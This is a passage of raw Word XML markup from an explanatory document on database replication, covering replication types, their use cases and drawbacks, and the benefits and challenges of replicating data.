      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718300D"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In asynchronous replication, data is written to the primary database first, and then replicated to other databases in the background without waiting for confirmation. This allows for faster transaction processing on the primary database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8220A"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Commonly used in scenarios where low latency is important, and eventual consistency is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E9FC3"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Drawback</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: There is a risk of data loss if the primary database fails before replication is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83FCA4" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Snapshot Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8002B5"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Snapshot replication takes a point-in-time copy of the entire dataset and replicates it to the target database. This is done at regular intervals, so it doesn’t continuously replicate changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF4BF82"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Suitable for scenarios where data does not change frequently or when a full copy of the database is needed periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B63AB55"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Drawback</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can cause high network and I/O load, and data might be outdated between snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B08BD6" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Transactional Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F14DCF"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Transactional replication involves the continuous replication of transactions (insert, update, delete) from the primary database to the replica. Each change is captured and applied to the replica in the same order as they occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842D976"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ideal for environments requiring near real-time replication and consistency across databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D66D9"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Drawback</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can be complex to set up and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F6AA5" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Merge Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B37A6"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Merge replication allows multiple databases to make changes independently, and these changes are synchronized later. If conflicts arise, a conflict resolution mechanism determines which changes to keep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802B0F2"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Suitable for distributed applications where multiple sites can update data independently, such as mobile applications or field offices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B255C" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Drawback</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Conflict resolution can be complex and may lead to data inconsistency if not handled properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4EE32" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Database Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92E1B6" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>High Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9CC06" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Provides redundancy by replicating data across multiple locations. If one database fails, another replica can take over, ensuring continuous availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944D1E8" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Read Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50356EF2" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributes read operations across multiple replicas, reducing the load on the primary database and improving query performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE2690" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disaster Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A2453" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Replicas can be used for disaster recovery. In case of a failure at the primary site, a replica in a different location can be promoted to the primary role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02605EF8" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Localization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46280944" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Replication allows data to be stored closer to users in different geographic locations, reducing latency and improving performance for distributed applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F83FE3" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7AB33" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By adding more replicas, you can scale read operations horizontally, allowing the system to handle more queries without overloading a single database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FA529" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Challenges of Database Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFE35F" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522864F" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Maintaining data consistency across all replicas can be challenging, especially in asynchronous replication where there may be a lag between updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38875386" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Conflict Resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C18D1" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In scenarios like merge replication, conflicts can occur when multiple replicas make changes independently. Resolving these conflicts correctly is crucial to maintaining data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170DB4D" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199D67D" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Synchronous replication introduces latency since the primary database must wait for confirmation from the replicas before completing a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6581E" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552F6784" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Setting up and managing a replication system can be complex, requiring careful planning, monitoring, and maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A30D18" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A18E8" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="392"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
